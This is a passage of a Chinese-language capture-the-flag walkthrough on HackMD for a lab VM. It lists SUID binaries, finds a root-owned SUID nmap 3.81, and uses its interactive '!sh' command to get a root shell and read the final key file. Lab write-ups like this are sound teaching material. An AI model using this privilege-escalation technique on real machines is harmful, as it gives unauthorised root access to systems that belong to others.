There is no commentSelect some text and then click Comment, or simply add a comment to this page from below to start a discussion.接下来看看目标系统中有哪些程序文件设置了SUID(Set owner U ser ID up on execution)位:
$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo /usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get -device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /
usr/lib/pt_chown
或者用这个命令
$ find / -perm -4000 -type f 2>/dev/null
这里遇见了一个老朋友 nmap 确切地说是旧版本 (3.81) 的,有趣的是,可执行文件的属主是 root :
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
这意味着我们可以用当前用户的身份开起 nmap 进程,而此时该进程理论上具有 root 权限。
看一下 nmap –help 的输出,告诉我们 nmap 有一个 interactive 模式,使用 –interactive 选项进入该模式:
robot@linux:~$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
interactive 模式是某种 REPL 环境,看一下文档:
nmap> h
h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
很好,nmap 可以运行 shell 命令,而且是以 root 身份,这就是提升权限漏洞(Privilege Escalation Exploit):
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
那就不客气了,直接以 root 身份打开 shell ,看看 root 的 home 路径下有什么:
nmap> !sh
# cd /root
# ls
firstboot_done key-3-of-3.txt
最后一个 key 到手:
# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
根據 WSL Config 介紹中的 Automount Settings章節描述,WSL 會默認將 windows 磁碟分區通過 DrfFS 檔案系統掛載到 /mnt 路徑下。
Aug 30, 2023linux2023: ahbji
Aug 20, 2023View the book with “<i class="fa fa-book fa-fw"></i> Book Mode”.
Aug 11, 2023View the book with “<i class="fa fa-book fa-fw"></i> Book Mode”.
Aug 9, 2023
HackMDor
By clicking below, you agree to our terms of service.
Sign in with Wallet
New to HackMD? Sign up